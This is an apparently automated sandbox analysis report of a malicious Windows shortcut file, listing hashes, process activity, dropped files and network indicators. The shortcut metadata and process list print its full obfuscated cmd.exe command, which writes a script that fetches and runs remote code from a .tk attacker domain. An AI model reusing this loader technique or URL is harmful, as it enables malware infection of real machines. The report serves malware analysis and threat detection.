analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

aacae30c289ddbd0b94eb283cf4b95f3229bab335702ab1b7f5e73dcbd69b776

Full analysis: https://app.any.run/tasks/80e76c2c-e470-4669-9715-f4d015831416
Verdict: Malicious activity
Analysis date: March 30, 2020, 19:16:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=9, Archive, ctime=Sat Jul 16 12:18:09 2016, mtime=Sat Jul 16 12:18:09 2016, atime=Sat Jul 16 12:18:09 2016, length=202752, window=hidenormalshowminimized
MD5:

B9473C7DFF23D94940C78723A0795315

SHA1:

851250E0DF025DA42C7201CE8BFFE5904D17E12A

SHA256:

AACAE30C289DDBD0B94EB283CF4B95F3229BAB335702AB1B7F5E73DCBD69B776

SSDEEP:

48:8u61VJ6VTN2ZjBPUR2sHfu5f6eYDynol5xTG5:8X1XOEj/6eYDynf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 1232)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 3364)
    • Executes scripts

      • explorer.exe (PID: 2724)
    • Executed via COM

      • explorer.exe (PID: 2724)
    • Reads Internet Cache Settings

      • WScript.exe (PID: 1232)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3364)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 1232)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString
FileAttributes: Archive
CreateDate: 2016:07:16 15:18:09+02:00
AccessDate: 2016:07:16 15:18:09+02:00
ModifyDate: 2016:07:16 15:18:09+02:00
TargetFileSize: 202752
IconIndex: 9
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: Windows
LocalBasePath: C:\Windows\System32\cmd.exe
Description: 996396872772317611871
RelativePath: ..\..\..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments: /c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5"
IconFileName: %SystemRoot%\system32\shell32.dll
MachineID: ns571773
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
3364"C:\Windows\System32\cmd.exe" /c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1084C:\Windows\system32\cmd.exe /S /D /c" sEt/p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%" 0<nul 1>C:\Users\Public\2iehhnh.js"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3872C:\Windows\system32\cmd.exe /S /D /c" md \ |"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1024exPlOreR /c, C:\Users\Public\2iehhnh.jsC:\Windows\explorer.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3576C:\Windows\system32\cmd.exe /S /D /c" exit 1>nul"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2688C:\Windows\system32\cmd.exe /S /D /c" echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5 1>nul"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2724C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\explorer.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1232"C:\Windows\System32\WScript.exe" "C:\Users\Public\2iehhnh.js" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Total events
3 744
Read events
179
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
1

Dropped files

PID
Process
Filename
Type
1232WScript.exeC:\Users\admin\AppData\Local\Temp\CabD421.tmp
MD5:
SHA256:
1232WScript.exeC:\Users\admin\AppData\Local\Temp\TarD422.tmp
MD5:
SHA256:
1232WScript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1binary
MD5:F350048EC59AF23FF6480A61193CAA4D
SHA256:4ABEE9E318CA036FF4082416825973B7D71E6285B8915CCEB5F6D794417D7DBE
1232WScript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1der
MD5:907131A56BA168672FD6DCA3988E2A2B
SHA256:7A4D281C2E93B883F2A05E43F75A91BCA5F83FB3F1FE3AC84FDA45D6146BAB05
1084cmd.exeC:\Users\Public\2iehhnh.jstext
MD5:26EC1B624C95FFA53EDD2658DB234DB6
SHA256:834A0E8586C365FB08DFB537FC2EF0CBDF036CA108313E164CDDA6F9A24F83CB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1232
WScript.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1232
WScript.exe
104.31.90.111:443
a6hbtfba8s.capanha01v4h6m7.tk
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
a6hbtfba8s.capanha01v4h6m7.tk
  • 104.31.90.111
  • 104.31.91.111
unknown
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a .tk domain - Likely Hostile
No debug info